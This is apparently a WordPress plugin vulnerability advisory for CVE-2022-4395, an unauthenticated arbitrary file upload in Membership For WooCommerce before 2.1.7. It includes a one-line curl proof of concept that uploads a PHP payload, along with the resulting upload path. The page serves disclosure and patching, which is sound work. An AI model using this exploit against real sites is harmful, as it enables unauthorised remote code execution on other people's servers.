WordPress Plugin Vulnerabilities

Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload

Description

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.

Proof of Concept

1. Install and activate WooCommerce (dependency, no setup required) 

2. Create a local file containing the payload on /tmp/payload.php 

3. Execute the following curl command:
 
curl -i 'https://example.com/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload' -F 'file=@/tmp/payload.php;type=text/csv'
 
4. The uploaded file will be available at wp-content/uploads/mfw-activity-logger/csv-uploads .

Affects Plugins

Plugin icon
membership-for-woocommerce
Fixed in 2.1.7

References

CVE
CVE-2022-4395

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
80407ac4-8ce3-4df7-9c41-007b69045c40

Timeline

Publicly Published
2023-01-04 (about 11 months ago)
Added
2023-01-04 (about 11 months ago)
Last Updated
2023-01-04 (about 11 months ago)

Other

Published
Title
Published
2019-06-15
Title
IP Address Blocker <= 10.3 - CSRF leading to Arbitrary File Upload
Published
2021-11-16
Title
Directorist – Business Directory Plugin < 7.0.6.2 - CSRF to Remote File Upload
Published
2014-08-01
Title
LB Mixed Slideshow 1.0 - Arbitrary File Upload
Published
2023-11-20
Title
CataBlog <= 1.7.0 - Authenticated (Editor+) Arbitrary File Upload
Published
2017-12-19
Title
AccessPress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload